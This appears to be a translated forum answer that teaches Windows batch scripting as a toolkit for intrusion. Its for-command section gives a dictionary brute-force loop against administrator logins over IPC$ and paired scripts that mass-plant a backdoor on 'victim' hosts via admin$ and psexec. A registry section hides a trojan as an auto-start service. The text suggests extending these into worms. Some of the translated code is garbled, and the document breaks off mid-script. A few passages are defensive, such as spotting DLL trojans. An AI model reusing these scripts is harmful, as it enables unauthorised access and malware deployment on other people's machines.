Tianliangshuowan'an, Level 4
2010-02-05 Answer
I have many, hope it helps you
Supplementary:
I. Brief Introduction to Simple Batch Processing Internal Commands
1. Echo command
Turn on or off the request echo function, or display a message. If there are no parameters, the echo command will display the current echo setting.
Syntax:
echo
Sample: @echo off / echo hello world
In practical applications, we will combine this command with the redirection symbol (also called the pipe symbol, generally using > >> ^) to implement inputting some commands into files of a specific format. This will be reflected in subsequent examples.
2. @ command
Indicates not to display the command after @. In the process of intrusion (for example, using a batch to format the enemy's hard disk), of course, we cannot let the other party see the commands we use.
Sample: @echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (the format command cannot use the /y parameter. Fortunately, Microsoft left the autoset parameter for us, and the effect is the same as /y.)
3. Goto command
Specify to jump to the label. After finding the label, the program will process the commands starting from the next line.
Syntax: goto label (label is the parameter, specifying the line in the batch program to be turned to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms (If you don't understand if, %1, %2 here, skip it first, and there will be detailed explanations later.)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
The name of the label can be any, but it is best to use meaningful letters. Add : in front of the letter to indicate that this letter is a label. The goto command is to find where to jump next according to this :. It is best to have some descriptions so that others can understand your intention.
4. Rem command
Comment command, which is equivalent to /*--------*/ in C language. It will not be executed, but only plays a comment role, which is convenient for others to read and your own future modification.
Rem Message
Sample: @Rem Here is the description.
5. Pause command
When the Pause command is run, the following message will be displayed:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
In this example, all files on the disk in drive A are copied to d:\back. When the displayed comment prompts you to put another disk into drive A, the pause command will suspend the program so that you can change the disk, and then press any key to continue processing.
6. Call command
Call another batch program from a batch program, and the parent batch program will not be terminated. The call command accepts the label used as the call target. If used outside a script or batch file, Call will not work on the command line.
Syntax:
call FileName ] ]
Parameters:
FileName
Specify the location and name of the batch program to be called. The filename parameter must have the .bat or .cmd extension.
7. start command
Call an external program. All DOS commands and command-line programs can be called by the start command.
Common parameters:
MIN starts with the window minimized
SEPARATE starts a 16-bit Windows program in a separate space
HIGH starts the application in the HIGH priority category
REALTIME starts the application in the REALTIME priority category
WAIT starts the application and waits for it to end
parameters These are parameters passed to the command/program
When the executed application is a 32-bit GUI application, CMD.EXE returns to the command prompt without waiting for the application to terminate. If executed in a command script, this new behavior will not occur.
8. choice command
The choice command allows the user to enter a character to run different commands. When using it, the /c: parameter should be added. The characters that can be entered should be written after c:, with no spaces in between. Its return code is 1234......
For example: choice /c:dme defrag,mem,end
The following will be displayed
defrag,mem,end?
Sample:
The content of Sample.bat is as follows:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (The highest error code should be judged first)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
After this file is run, defrag,mem,end? will be displayed. The user can choose d m e, then the if statement will make a judgment. d means executing the program segment labeled defrag, m means executing the program segment labeled mem, e means executing the program segment labeled end. Each program segment finally uses goto end to jump the program to the end label, then the program will display good bye, and the file ends.
9. If command
if means to judge whether the specified condition is met, so as to decide to execute different commands.
There are three formats:
1)、if "parameter" == "string" command to be executed
If the parameter is equal to the specified string, the condition is established, and the command is run, otherwise the next sentence is run. (Note that there are two equal signs)
Such as if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2)、if exist filename command to be executed
If the specified file exists, the condition is established, and the command is run, otherwise the next sentence is run.
Such as if exist config.sys edit config.sys
3)、if errorlevel / if not errorlevel number command to be executed
If the return code is equal to the specified number, the condition is established, and the command is run, otherwise the next sentence is run.
Such as if errorlevel 2 goto x2
All DOS programs return a number to DOS when running, called errorlevel or return code. Common return codes are 0 and 1.
10. for command
The for command is a relatively complex command, mainly used to loop and execute commands within a specified range of parameters.
When using the FOR command in a batch file, use %%variable to specify the variable
for {%variable│%%variable} in (set) do command
%variable specifies a single letter replaceable parameter.
(set) specifies one or a group of files. Wildcards can be used.
command specifies the command to be executed for each file.
command-parameters specify parameters or command-line switches for a specific command.
When using the FOR command in a batch file, use %%variable to specify the variable
instead of %variable. Variable names are case-sensitive, so %i is different from %I
If command extensions are enabled, the following additional FOR command formats will be supported:
FOR /D %variable IN (set) DO command
If wildcards are included in the concentration, it means matching with the directory name, not with the file name.
FOR /R path] %variable IN (set) DO command
Check the directory tree rooted at path, and point to the FOR statement in each directory. If no directory is specified after /R, the current directory is used. If the set is only a single dot (.) character, the directory tree is enumerated.
FOR /L %variable IN (start,step,end) DO command
The set represents a sequence of numbers from start to end in increments.
Therefore, (1,1,5) will generate the sequence 1 2 3 4 5, and (5,-1,1) will generate
sequence (5 4 3 2 1).
FOR /F %variable IN (file-set) DO command
FOR /F %variable IN ("string") DO command
FOR /F %variable IN ('command') DO command
Or, if the usebackq option is used:
FOR /F %variable IN (file-set) DO command
FOR /F %variable IN ("string") DO command
FOR /F %variable IN ('command') DO command
filenameset is one or more filenames. Before continuing to the next file in filenameset, each file has been opened, read, and processed.
Processing includes reading the file, dividing it into lines of text, and then parsing each line into zero or more symbols. Then the For loop is called with the found symbol string variable value. By default, /F separates the first blank symbol in each line of each file. Skip blank lines. You can specify the optional "options" parameter instead of the default parsing operation. This quoted string includes one or more keywords specifying different parsing options. These keywords are:
eol=c - refers to the end of a line comment character (just one)
skip=n - refers to the number of lines to be ignored at the beginning of the file.
delims=xxx - refers to the delimiter set. This replaces the default delimiter set of spaces and tabs.
tokens=x,y,m-n - refers to which symbol of each line is passed to for itself in each iteration. This will result in the format of additional variable names as a range. Specify the last character asterisk of the m symbol string through the nth symbol, then the additional variable will be assigned and accepted the reserved text of the line after the last symbol parsing.
usebackq - specifies that the new syntax has been used in the following cases:
When executing a backquoted string as a command and the quote character is a literal string command and allows file names enclosed in double quotes in file-set.
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
It will analyze each line in myfile.txt, ignore those lines starting with semicolons, and pass the second and third symbols in each line to the for program body; delimited by commas and/or spaces. Please note that the statement of this for program body refers to %i to get the second symbol, %j to get the third symbol, and %k to get all the remaining symbols after the third symbol. For file names with spaces, you need to enclose the file name in double quotes. To use double quotes in this way, you also need to use the usebackq option, otherwise, the double quotes will be understood as being used to define a string to be parsed.
%i is specifically explained in the for statement, and %j and %k are specifically explained through the tokens= option. You can specify up to 26 symbols through tokens= in one line, as long as you do not try to specify a variable higher than the letter 'z' or 'Z'. Remember that FOR variables are single letters, case-sensitive, and global; and there cannot be more than 52 in use.
You can also use the FOR /F analysis logic on adjacent strings; the method is to enclose the filenameset between parentheses with single quotes.
In this way, the string will be treated as a single input line in a file.
Finally, you can use the FOR /F command to analyze the output of the command. The method is to turn the filenameset between parentheses into a backquoted string. This string will be treated as a command line, passed to a sub CMD.EXE, and its output will be captured in memory and treated as a file analysis. Therefore, the following example:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
It will enumerate the environment variable names in the current environment.
In addition, the replacement of FOR variable references has been enhanced. You can now use the following option syntax:
~I - remove any quotes ("), expand %I
%~fI - expand %I to a fully qualified path name
%~dI - only expand %I to a drive letter
%~pI - only expand %I to a path
%~nI - only expand %I to a file name
%~xI - only expand %I to a file extension
%~sI - the expanded path only contains short names
%~aI - expand %I to the file attributes of the file
%~tI - expand %I to the date/time of the file
%~zI - expand %I to the size of the file
%~$PATH:I - find the directory listed in the path environment variable, and expand %I to the first fully qualified name found. If the environment variable is not defined, or the file is not found, this combination key will expand to an empty string
You can combine modifiers to get multiple results:
%~dpI - only expand %I to a drive letter and path
%~nxI - only expand %I to a file name and extension
%~fsI - only expand %I to a complete path name with a short name
%~dp$PATH:i - find the directory listed in the path environment variable, and expand %I to the first drive letter and path found.
%~ftzaI - expand %I to a DIR-like output line
In the above example, %I and PATH can be replaced with other valid values. The %~ syntax is terminated with a valid FOR variable name. Choosing an uppercase variable name like %I is easy to read and avoids confusion with case-insensitive combination keys.
The above is the official help from MS. Below we give a few examples to specifically illustrate the use of the For command in intrusion.
sample2:
Use the For command to implement brute-force password cracking on a target Win2k host.
We use net use \\ip\ipc$ "password" /u:"administrator" to try to connect with the target host. When it is successful, record the password.
The main command is a line: for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
Use i% to represent the password of admin. In dict.txt, the value of i% is taken to connect with the net use command. Then the running result of the program is passed to the find command -
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":The command completed successfully">>D:\ok.txt, and then it's done.
sample3:
Do you ever have a large number of zombies waiting for you to plant backdoors + trojans? When the number is particularly large, what was originally a happy thing will become very depressed:) The article mentioned at the beginning that using batch files can simplify daily or repetitive tasks. So how to achieve it? Hehe, you will understand when you read on.
The main command is also only one line: (when using the FOR command in a batch file, specify the variable using %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
For the usage of tokens, please refer to sample1 above. Here it means to pass the content in victim.txt to the parameters %i %j %k in door.bat in sequence.
And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy the trojan + backdoor to the victim, then use the return code (If errorlever =) to screen the host that successfully plants the backdoor, and echo it out, or echo it to a specified file.
delims= means that the content in vivtim.txt is separated by a space. I think you must understand what the content in this victim.txt is like when you see here. It should be arranged according to the objects represented by %%i %%j %%k. Generally, it is ip password username.
Code outline:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
This is just a prototype of an automatic backdoor planting batch. The two batch files, the backdoor program (Windrv32.exe), and PSexec.exe need to be placed in the same directory. The batch content
can also be expanded, for example: add functions to clear logs + DDOS, add functions to add users regularly, and go deeper to make it have automatic propagation functions (worms). I won't go into details here. Interested friends can study it by themselves.
II. How to Use Parameters in Batch Files
Parameters can be used in batch processing. Generally, there are nine parameters from 1% to 9%. When there are multiple parameters, shift is needed to move, which is not common, so we don't consider it.
sample1: fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat It can't be written down, sent in several batches!!!
Supplementary:
This example is used to continuously format several floppy disks, so when using it, you need to enter fomat.bat a in the dos window. Hehe, it seems a bit superfluous~
sample2:
When we always need to enter a long string of commands to establish an IPC$ connection, and it is easy to make mistakes, so we might as well write some fixed commands into a batch, and use the ip password username of the zombie as parameters to assign to this batch, so that we don't need to type the commands every time.
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" Note that here PASSWORD is the second parameter.
@if errorlevel 1 echo connection failed
How about it, using parameters is still relatively simple? You must have learned it. No.3
III. How to Use Compound Commands (Compound Command)
1. &
Usage: First command & Second command
Use this method to execute multiple commands at the same time, regardless of whether the command is executed successfully
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage: First command && Second command
Use this method to execute multiple commands at the same time. When encountering a command that fails to execute, the subsequent commands will not be executed. If there is no error, all commands will be executed all the time;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This command may be used more simply when doing backups, such as:
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb
E:\backup
If the backup.mdb file exists on the remote server, the copy command will be executed. If the file does not exist, the copy command will not be executed. This usage can replace IF exist.
3.││
Usage: First command ││ Second command
Use this method to execute multiple commands at the same time. When encountering a command that executes correctly, the subsequent commands will not be executed. If no correct command appears, all commands will be executed all the time;
Sample:
C:\Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Example of combined command use:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3
>>victim.txt
IV. Use of Pipe Commands
1. │ command
Usage: First command │ Second command
Use the result of the first command as the parameter of the second command. Remember that this method is very common in unix.
sample:
time /t>>D:\IP.log
netstat -n -p tcp│find ":3389">>D:\IP.log
start Explorer
Can you see it? It is used for terminal services to allow us to customize the starting program for the user to implement letting the user run the following bat to obtain the IP of the logged-in user.
2. >, >> output redirection command
Redirect the output result of a command or a certain program to a specific file. The difference between > and >> is that > will clear the content in the original file and then write to the specified file, while >> will only append content to the specified file without changing the content in it.
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
Nowadays, DLL trojans are popular. We know that system32 is a good place to hide. Many trojans are sharpening their heads to get in there, and DLL horses are no exception. In response to this point, we can record the EXE and DLL files in this directory after installing the system and necessary applications:
Run CMD--switch the directory to system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
In this way, the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt respectively,
In the future, if there is an abnormality but no problem is found by traditional methods, it is necessary to consider whether a DLL trojan has entered the system.
At this time, we use the same command to record the EXE and DLL files in system32 into exeback1.txt and dllback1.txt, and then run:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt. (Use the FC command to compare the DLL and EXE files of the previous two times, and input the result into diff.txt), so that we can find some extra DLL and EXE files,
Then, by checking the creation time, version, whether it is compressed, etc., it is easier to judge whether it has been visited by a DLL trojan. It is best if there is none. If there is, don't directly DEL it. First use regsvr32 /u trojan.dll to unregister the backdoor DLL file, then move it to the recycle bin. If there is no abnormal reflection in the system, then delete it completely or submit it to the antivirus software company.
3. < 、>& 、<&
< reads the command input from the file instead of from the keyboard.
>& writes the output of one handle to the input of another handle.
<& reads input from one handle and writes it to the output of another handle.
These are not commonly used, so I won't introduce them more.
V. How to Use Batch Files to Operate the Registry
In the process of intrusion, we often operate the specific key values of the registry to achieve certain purposes. For example, to hide the residual key values of the backdoor and trojan program, or to create a service to load the backdoor. Of course, we will also modify the registry to strengthen the system or change a certain attribute of the system. These all require us to have a certain understanding of registry operations. Below we first learn how to use the .REG file to operate the registry. (We can use a batch to generate a REG file)
Regarding the operation of the registry, the common ones are creation, modification, and deletion.
1. Creation
Creation is divided into two types, one is to create a subkey (Subkey)
We create a file with the following content:
Windows Registry Editor Version 5.00
Then execute this script, and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
The other is to create a project name
Then this file format is a typical file format, consistent with the file format you export from the registry, and the content is as follows:
Windows Registry Editor Version 5.00
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
In this way, three projects: Invader, door, about are newly created under
The type of Invader is "String value"
The type of door is "REG SZ value"
The type of Autodos is "DWORD value"
2. Modification
Modification is relatively simple. Just export the project you need to modify, then modify it with Notepad, and then import it (regedit /s).
3. Deletion
Let's first talk about deleting a project name. We create a file as follows:
Windows Registry Editor Version 5.00
"Ex4rch"=-
Execute this script, and "Ex4rch" under is deleted;
Let's take a look at deleting a subkey. We create a script as follows:
Windows Registry Editor Version 5.00
Execute this script, and has been deleted.
I believe you have basically mastered the .reg file when you see here. Then the current goal is to use a batch to create a .reg file with specific content. Remember that we mentioned earlier that the redirection symbol can be used to easily create files of a specific type.
samlpe1: For example, the above example. If you want to generate the following registry file
Windows Registry Editor Version 5.00
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
You only need to do this:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo >Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
When we are using some relatively old trojans, we may generate a key value under the registry
to realize the self-start of the trojan. But this is very easy to expose the path of the trojan program, thus leading to the trojan being killed. Relatively speaking, if the trojan program is registered as a system service, it is relatively safe. Take the configured IRC trojan DSNX as an example (named windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=
c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM
@REM This is safer.
VI. Wonderful Example Release.
1. Batch to delete the default shares of win2k/xp system
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
http://wenwen.sogou.com/z/q178444210.htm
